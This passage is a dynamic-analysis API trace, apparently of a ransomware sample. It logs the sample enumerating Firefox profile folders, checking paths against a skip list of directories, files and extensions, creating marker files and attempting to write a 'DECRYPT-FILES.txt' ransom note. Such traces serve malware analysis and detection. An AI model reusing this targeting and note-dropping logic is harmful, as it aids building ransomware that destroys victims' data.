HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Games\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\All Users") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="AhnLab") returned 0x0 [0182.667] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.667] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0182.667] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.667] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\0a16c9.tmp") returned 76 [0182.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0182.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0182.668] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.668] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\DECRYPT-FILES.txt") returned 83 [0182.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.668] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0182.668] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*" [0182.668] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0182.668] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.668] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.668] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.668] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.668] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefe58100, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefe58100, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefe58100, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.668] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.669] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.669] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.669] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.669] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.669] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.669] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0182.669] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.669] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" [0182.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\0a16c9.tmp" [0182.669] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\extensions\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.669] CloseHandle (hObject=0x0) returned 0 [0182.669] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.670] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.670] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.670] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac34a580, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac34a580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac34a580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0182.670] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0182.670] CloseHandle (hObject=0x26c) returned 1 [0182.670] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xad3a7cc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad3a7cc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Firefox", cAlternateFileName="")) returned 1 [0182.670] lstrcmpW (lpString1="Firefox", lpString2=".") returned 1 [0182.670] lstrcmpW (lpString1="Firefox", lpString2="..") returned 1 [0182.670] lstrcatW (in: lpString1="Firefox", lpString2="\\" | out: lpString1="Firefox\\") returned="Firefox\\" [0182.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Program Files") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch=":\\Windows") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Games\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\All Users") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="AhnLab") returned 0x0 [0182.670] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0182.670] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.670] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\0a16c9.tmp") returned 73 [0182.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0182.946] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0182.947] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.947] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\DECRYPT-FILES.txt") returned 80 [0182.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.947] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0182.947] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*" [0182.947] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf01059c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf01059c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0182.947] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.947] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xf01059c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf01059c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.947] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.947] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.947] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf01059c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf01059c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf01059c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.947] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.947] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.947] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.947] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.947] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.947] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.948] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned 62 [0182.948] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.948] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\" [0182.948] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\0a16c9.tmp" [0182.948] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.948] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.948] CloseHandle (hObject=0x0) returned 0 [0182.948] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.948] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crash Reports", cAlternateFileName="CRASHR~1")) returned 1 [0182.948] lstrcmpW (lpString1="Crash Reports", lpString2=".") returned 1 [0182.949] lstrcmpW (lpString1="Crash Reports", lpString2="..") returned 1 [0182.949] lstrcatW (in: lpString1="Crash Reports", lpString2="\\" | out: lpString1="Crash Reports\\") returned="Crash Reports\\" [0182.949] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\", lpString2="Crash Reports\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\" [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Program Files") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch=":\\Windows") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Games\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\All Users") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="AhnLab") returned 0x0 [0182.949] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.949] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0182.949] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.949] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\0a16c9.tmp") returned 87 [0182.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0183.095] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0183.095] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0183.095] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\DECRYPT-FILES.txt") returned 94 [0183.095] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0183.684] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\") returned 76 [0183.684] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\*" [0183.684] 